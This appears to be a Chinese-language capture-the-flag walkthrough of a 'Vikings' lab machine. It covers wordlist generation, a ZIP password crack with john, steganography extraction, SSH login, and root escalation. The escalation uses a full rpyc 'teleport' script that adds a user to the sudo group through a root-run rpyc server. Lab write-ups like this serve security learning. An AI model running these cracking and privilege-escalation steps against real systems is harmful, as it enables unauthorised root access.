865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)
text = r"865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)"
text_dict = text.split(' ')
格式化去重
res = []
[res.append(re.sub(r'[\W]', '', i) + r'.%EXT%' + '\n') for i in text_dict if i not in res]
生成字典文件
with open('text_dict.txt', 'w', encoding='utf-8') as f:
f.writelines(res)
破译 john data --wordlist=/usr/share/wordlists/rockyou.txt
┌──(kali㉿kali)-[~/workspace]
└─$ john data --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 SSE2 4x])
Cost 1 (HMAC size) is 1410760 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
ragnarok123 (a.zip/king)
1g 0:00:01:11 DONE (2022-12-01 13:15) 0.01403g/s 4143p/s 4143c/s 4143C/s raihanah..raejean
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
密码为 ragnarok123
解压后是一张图片 king
密码的 ragnarok 也是前文中的一个人名
隐写术
一般这种刻意隐藏,已经和图片或 pdf 都会涉及隐写术,我们使用相关工具进行检验
┌──(kali㉿kali)-[~/workspace]
└─$ steghide info king
"king":
format: jpeg
capacity: 76.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
其中雀实存在隐写,但存在密码
┌──(kali㉿kali)-[~/workspace]
└─$ foremost king 127 ⨯
Processing: king
|foundat=user��wK��/-v�O,I*��II-�O����t(����K/V p���9�▒�'��1W�
*|
使用 foremost 提取数据会在当前目录下生成 output 的目录
┌──(kali㉿kali)-[~/workspace]
└─$ tree output
output
├── audit.txt
├── jpg
│ └── 00000000.jpg
└── zip
└── 00002792.zip
2 directories, 3 files
audit.txt 是日志不用管
00000000.jpg 是原本那张图片
00002792.zip 就是我们需要的隐藏数据
┌──(kali㉿kali)-[~/workspace]
└─$ unzip output/zip/00002792.zip
Archive: output/zip/00002792.zip
inflating: user
<title>Split</title>
Ivar The Boneless
<h1>Mad King</h1>
865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)
┌──(kali㉿kali)-[~]
└─$ ssh floki@192.168.56.120
The authenticity of host '192.168.56.120 (192.168.56.120)' can't be established.
ED25519 key fingerprint is SHA256:volom5GRMcetvgfJsyVTXVnNY0FUA6W1k/5fsdHs9T4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.120' (ED25519) to the list of known hosts.
floki@192.168.56.120's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Dec 2 01:49:58 UTC 2022
System load: 0.23 Processes: 98
Usage of /: 52.0% of 8.79GB Users logged in: 0
Memory usage: 18% IP address for enp0s3: 192.168.56.120
Swap usage: 0%
0 updates can be applied immediately.
You have mail.
Last login: Sat Sep 4 04:38:04 2021 from 10.42.0.1
floki@vikings:~$ id
uid=1000(floki) gid=1000(floki) groups=1000(floki),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)
尝试提权
先查看一下当前目录的信息
floki@vikings:~$ ls
boat readme.txt
floki@vikings:~$ cat boat
#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
floki@vikings:~$ cat readme.txt
_______________________________________________________________________Floki-Creation____________________________________________________________________________________________________
I am the famous boat builder Floki. We raided Paris this with our all might yet we failed. We don't know where Ragnar is after the war. He is in so grief right now. I want to apologise to him.
Because it was I who was leading all the Vikings. I need to find him. He can be anywhere.
I need to create this `boat` to find Ragnar
#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
num 是第 29 个素数
collatz-conjecture 数学的考拉兹猜想
需要是可打印的字符
编写代码,记着可以使用分屏 ctrl+shift+D
import math
prime = []
for i in range(2, 10000):
if i == 2:
prime.append(i)
else:
for j in range(2, int(math.sqrt(i)) + 1):
if i % j == 0:
break
else:
prime.append(i)
num = prime[28]
c = []
while num != 1:
if 0x20 <= num and num <= 0x7E:
print(chr(num), end='')
if num % 2 == 1:
num = 3 * num + 1
else:
num //= 2
$ ls -lah
total 48K
drwxr-xr-x 5 floki floki 4.0K Sep 4 2021 .
drwxr-xr-x 4 root root 4.0K Sep 3 2021 ..
lrwxrwxrwx 1 root root 9 Sep 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 floki floki 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 floki floki 3.7K Apr 4 2018 .bashrc
-rw-r--r-- 1 floki floki 82 Oct 11 2020 boat
drwx------ 2 floki floki 4.0K Sep 3 2021 .cache
drwx------ 3 floki floki 4.0K Sep 3 2021 .gnupg
drwxrwxr-x 3 floki floki 4.0K Sep 3 2021 .local
-rw-r--r-- 1 floki floki 806 Sep 4 2021 .profile
-rw-r--r-- 1 floki floki 516 Oct 11 2020 readme.txt
-rw-rw-r-- 1 floki floki 66 Sep 3 2021 .selected_editor
-rw-r--r-- 1 floki floki 0 Sep 3 2021 .sudo_as_admin_successful
-rw------- 1 floki floki 897 Sep 4 2021 .viminfo
$ ls
boat readme.txt
$ cat boat
#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
$ cat readme.txt
_______________________________________________________________________Floki-Creation____________________________________________________________________________________________________
I am the famous boat builder Floki. We raided Paris this with our all might yet we failed. We don't know where Ragnar is after the war. He is in so grief right now. I want to apologise to him.
Because it was I who was leading all the Vikings. I need to find him. He can be anywhere.
I need to create this `boat` to find Ragnar
$
和上一个 Floki 很像,但并没有什么有价值的信息
在开始时有一个输入的过程,说明它自启动了某种脚本,而且在 floki 上是 bash 但 ragnar 却使用的 sh 这明显不合理,在 linux 中 bash 存在一种自登录的机制,那么我们开始时的那个脚本是不是于此有关
综上我们应该查看 .bashrc 、 .profile 文件一般会有 bash 自启动的程序
$ cat .profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022
sudo python3 /usr/local/bin/rpyc_classic.py
# if running bash
if [ -n "$BASH_VERSION" ]; then
# include .bashrc if it exists
if [ -f "$HOME/.bashrc" ]; then
. "$HOME/.bashrc"
fi
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
PATH="$HOME/bin:$PATH"
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/.local/bin" ] ; then
PATH="$HOME/.local/bin:$PATH"
fi
$
下面代码是在目标上执行,作用是进行 rpyc server 的请求,上面的 Python 登录是关于 rpyc server 的内容,不了解可以去百度
import rpyc
def shell():
import os
os.system('sudo usermod -a -G sudo ragnar')
conn = rpyc.classic.connect('localhost')
fn = conn.teleport(shell)
fn()
先确认 ss -pantu | grep 18812 端口是否开放,再执行 exp.py 然后再重新登录
ragnar@vikings:~$ python3 exp.py
ragnar@vikings:~$ sudo su root
[sudo] password for ragnar:
Sorry, try again.
[sudo] password for ragnar:
sudo: 1 incorrect password attempt
ragnar@vikings:~$ exit
exit
$ exit
Connection to 192.168.56.120 closed.
┌──(kali㉿kali)-[~]
└─$ ssh ragnar@192.168.56.120 1 ⨯
ragnar@192.168.56.120's password:
Permission denied, please try again.
ragnar@192.168.56.120's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Dec 2 03:20:13 UTC 2022
System load: 0.0 Processes: 95
Usage of /: 52.3% of 8.79GB Users logged in: 0
Memory usage: 18% IP address for enp0s3: 192.168.56.120
Swap usage: 0%
0 updates can be applied immediately.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Dec 2 02:56:08 2022 from 192.168.56.116
[sudo] password for ragnar:
Traceback (most recent call last):
File "/usr/local/bin/rpyc_classic.py", line 130, in <module>
ClassicServer.run()
File "/usr/local/lib/python3.6/dist-packages/plumbum/cli/application.py", line 609, in run
retcode = inst.main(*tailargs)
File "/usr/local/bin/rpyc_classic.py", line 89, in main
self._serve_mode(ThreadedServer)
File "/usr/local/bin/rpyc_classic.py", line 100, in _serve_mode
registrar=self.registrar, auto_register=self.auto_register)
File "/usr/local/lib/python3.6/dist-packages/rpyc/utils/server.py", line 90, in __init__
self.listener.bind(address)
OSError: [Errno 98] Address already in use
$ bash -i
ragnar@vikings:~$ sudo -s
# id
uid=0(root) gid=0(root) groups=0(root)